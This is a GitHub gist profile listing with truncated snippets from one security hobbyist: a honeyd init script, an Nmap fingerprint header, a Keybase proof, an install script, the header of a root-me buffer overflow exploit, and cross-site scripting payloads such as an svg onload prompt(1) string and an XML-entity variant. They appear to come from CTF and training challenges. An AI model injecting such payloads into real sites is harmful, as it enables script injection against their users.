Skip to content

Instantly share code, notes, and snippets.

View Creased's full-sized avatar

Baptiste MOINE Creased

View GitHub Profile
#!/bin/sh -e
#
### BEGIN INIT INFO
# Provides: honeyd
# Required-Start:
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Service to simulate hosts and networks
# Description: Daemon that provides a way to fully simulate
# Nmap OS Fingerprint List. -*- mode: fundamental; -*-
# $Id: nmap.prints,v 1.7 2005/09/24 22:49:05 provos Exp $
#
# Contributions to this database are welcome. If Nmap obtains a new
# fingerprint (and test conditions are favorable), it will print out a
# URL you can use to submit the fingerprint. If Nmap guesses wrong,
# please send the full Nmap output and the exact destination host OS
# name and version to fyodor@insecure.org . Thanks!
#
# By submitting fingerprints you are transfering any and all copyright
@Creased
Creased / hip-2016-4.md
Created April 9, 2016 00:53
Hack in Paris 2016 - Challenge 4

Hack in Paris 2016 - Challenge 4

Keybase proof

I hereby claim:

  • I am Creased on github.
  • I am creased (https://keybase.io/creased) on keybase.
  • I have a public key whose fingerprint is 327D BAD6 978E E6BF 2812 1328 5802 D817 860B 5424

To claim this, I am signing this object:

@Creased
Creased / openims_install.sh
Last active May 29, 2019 10:07
OpenIMS one-shot installation script
#!/usr/bin/env bash
#
# Written by:
# Baptiste MOINE <contact@bmoine.fr>
#
function print() {
if (( $# == 1 )); then
str=${1}
printf "%b" "${str}\n" >&3
@Creased
Creased / exploit.py
Created December 9, 2016 15:06
Buffer overflow exploit template
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for root-me challenge #
# ELF32 - Stack buffer overflow basic 1 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
@Creased
Creased / payload
Last active May 3, 2017 12:08
xss payloads
prompt(1)
@Creased
Creased / 0x0.html
Last active July 18, 2023 15:12
prompt(1) to win
"><svg/onload=prompt(1)>
<!DOCTYPE html [
<!ENTITY lt "<">
<!ENTITY ob "svg">
<!ENTITY at "onload">
<!ENTITY pa "alert">
<!ENTITY va "1">
<!ENTITY gt ">">
<!ENTITY xss "&lt;&ob;/&at;=&pa;(&va;)&gt;">
]>
/*!
* Author: Baptiste MOINE <contact@bmoine.fr>
* Project: OTP QR-Code Generator
* Homepage: https://vps.bmoine.fr/totp-qrcode/
* Released: 17/04/2017
*
* Based on http://www.herongyang.com/Encoding/Base32-Encoding-Algorithm.html
*
* Base32 encoding process:
* 0. Get input string + remove carriage return and new line;